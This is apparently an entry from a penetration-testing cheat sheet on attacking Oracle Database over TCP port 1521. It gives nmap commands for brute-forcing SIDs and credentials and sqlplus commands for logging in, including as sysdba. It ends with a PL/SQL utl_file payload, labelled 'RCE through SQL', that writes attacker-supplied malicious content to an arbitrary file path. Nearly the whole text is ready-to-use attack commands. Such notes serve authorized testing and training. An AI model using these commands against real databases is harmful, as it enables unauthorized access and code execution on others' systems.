Oracle Database
Port: 1521Protocol:tcp
Table of content
Description
The idea is to enumerate the SID, then enumerate the user and finaly connect to the database.
If the privileges allows it, it is possible to connect as sysdba and load a malicious file.
SID bruteforce
nmap --script oracle-sid-brute ${ip}
Creds bruteforce
# Default creds list : /usr/share/nmap/nselib/data/oracle-default-accounts.lst
# Use brute.credfile to load specific user/password list
nmap --script oracle-brute --script-args oracle-brute.sid=${oracleSID} ${ip}
SQLPlus
# Connection with the user
sqlplus ${user}/${pass}@${ip}:${port}/${SID}
# Connection with the user but with sysdba privileges
sqlplus ${user}/${pass}@${ip}:${port}/${SID} as sysdba
RCE through SQL
The / at the end of the payload is mandatory.
declare
f utl_file.file_type;
s varchar(5000) := '${maliciousContent}';
begin
f := utl_file.fopen(${path}, ${file}, 'W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
/